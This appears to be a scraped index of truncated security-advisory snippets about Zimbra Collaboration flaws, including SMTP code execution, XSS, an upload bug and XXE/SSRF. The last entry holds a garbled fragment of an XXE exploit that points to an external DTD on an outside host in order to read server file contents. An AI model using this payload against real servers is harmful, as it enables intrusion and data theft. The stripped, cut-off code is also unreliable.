Vulnerabilities fixed in Zimbra

Synacor has fixed vulnerabilities in Zimbra Collaboration. By sending a specially prepared e-mail to the SMTP server, code execution can be obtained directly on the Zimbra server that can be used, for example, to place a webshell. Researchers have published Proof-of-Concept code that demonstrates...

Vulnerabilities fixed in Zimbra

Vulnerabilities have been fixed in Zimbra. A malicious party could exploit vulnerabilities to gain access to system data, bypass a security measure, or launch a Cross-Site Scripting attack. Such an attack can lead to execution of arbitrary code in the context of the victim's victim's browser, or...

Zimbra Code Issues Vulnerabilities

Zimbra is the United States Zimbra company's set of open source e-mail collaboration platform. A code issue vulnerability exists in the /service/upload program in the Webmail subsystem in versions of Zimbra prior to 8.8.15 Patch 10 and 9.x prior to 9.0.0 Patch 3, which can be exploited by an...

Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery Vulnerability

Exploit for jsp platform in category web applications Zimbra |";int c;while c = in.read != -1 out.printcharc;in.close;out.print"|' printbaseurl dtd file url dtdurl="https://k8gege.github.io/zimbra.dtd" """ " !ENTITY % all "!ENTITY fileContents '%start;...